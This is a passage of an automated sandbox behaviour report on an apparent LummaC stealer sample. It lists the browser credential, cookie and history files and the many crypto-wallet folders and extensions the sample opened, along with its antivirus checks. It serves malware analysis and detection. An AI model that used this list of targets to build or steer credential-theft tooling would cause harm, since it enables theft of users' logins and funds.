            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CAC40B __EH_prolog3_GS,CreateNamedPipeW,LocalFree,CreateFileW,??0SBIPCMessage_Connect@@QAE@XZ,GetCurrentProcessId,?SetMsgType@CmmInternelMsg@Cmm@@QAEXH@Z,??1?$CmmMessageTemplate_1@I@Archive@Cmm@@UAE@XZ,0_2_00CAC40B
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00D00155 ?Unlock@CState@Cmm@@QAEXXZ,GetSystemTimeAsFileTime,0_2_00D00155
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CFE1C4 _free,GetTimeZoneInformation,_free,0_2_00CFE1C4
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1837241948.0000000003063000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1804407153.0000000003063000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000002.1838245473.0000000003060000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1836784813.0000000003060000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000002.1838350467.0000000003064000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rwsNDpQSKZ.exe PID: 6820, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Found many strings related to Crypto-Wallets (likely being stolen)
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1789697826.00000000030BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ":0,"p":"%appdata%\\Electrum-LTC\\wallet
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1789697826.00000000030BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 520},{"t":0,"p":"%appdata%\\ElectronCash]
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1789697826.00000000030BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: llets/JAXX New Version","d":2,"fs":20971
            Source: rwsNDpQSKZ.exe, 00000000.00000002.1838350467.0000000003079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1789398984.0000000003062000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
            Source: rwsNDpQSKZ.exe, 00000000.00000002.1838350467.0000000003079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
            Source: rwsNDpQSKZ.exe, 00000000.00000002.1838350467.0000000003079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1789281360.0000000003045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1789398984.0000000003062000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Tries to steal Crypto Currency Wallets
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
